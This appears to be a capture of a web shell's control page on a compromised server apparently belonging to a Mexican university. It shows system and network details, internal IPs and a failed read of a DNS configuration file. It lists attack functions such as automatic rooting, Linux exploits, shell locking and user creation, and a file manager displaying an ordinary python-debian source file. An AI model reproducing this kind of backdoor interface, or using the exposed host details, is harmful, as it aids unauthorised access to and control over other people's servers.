Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
debian /
[ HOME SHELL ]
Name
Size
Permission
Action
_deb822_repro
[ DIR ]
drwxr-xr-x
__pycache__
[ DIR ]
drwxr-xr-x
arfile.py
13.42
KB
-rw-r--r--
changelog.py
37.95
KB
-rw-r--r--
copyright.py
24.2
KB
-rw-r--r--
deb822.py
99.45
KB
-rw-r--r--
debfile.py
15.58
KB
-rw-r--r--
debian_support.py
26.76
KB
-rw-r--r--
debtags.py
18.58
KB
-rw-r--r--
deprecation.py
1.7
KB
-rw-r--r--
__init__.py
1012
B
-rw-r--r--
py.typed
0
B
-rw-r--r--
_util.py
13.16
KB
-rw-r--r--
_version.py
65
B
-rw-r--r--
watch.py
9.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
""" Tools for working with Debian-related file formats """ __version__ = "" try: # pylint: disable=no-member import debian._version __version__ = debian._version.__version__ except ImportError: try: # Try to extract the version from the package changelog and # determine whether it is a post-release or pre-release version. import os.path import debian.changelog changelog_filename = os.path.join( os.path.dirname(__file__), '..', '..', 'debian', 'changelog') with open(changelog_filename, 'rb') as fh: c = debian.changelog.Changelog(fh) version = str(c.version) mark = "~" if c.distributions == 'UNRELEASED' else "+" except: # pylint: disable=bare-except # Fake a version string in desperation version = '0.0.0' mark = '-' import datetime timestamp = datetime.datetime.utcnow().strftime("%Y%m%d") __version__ = "%s%sgit%s" % (version, mark, timestamp)
Close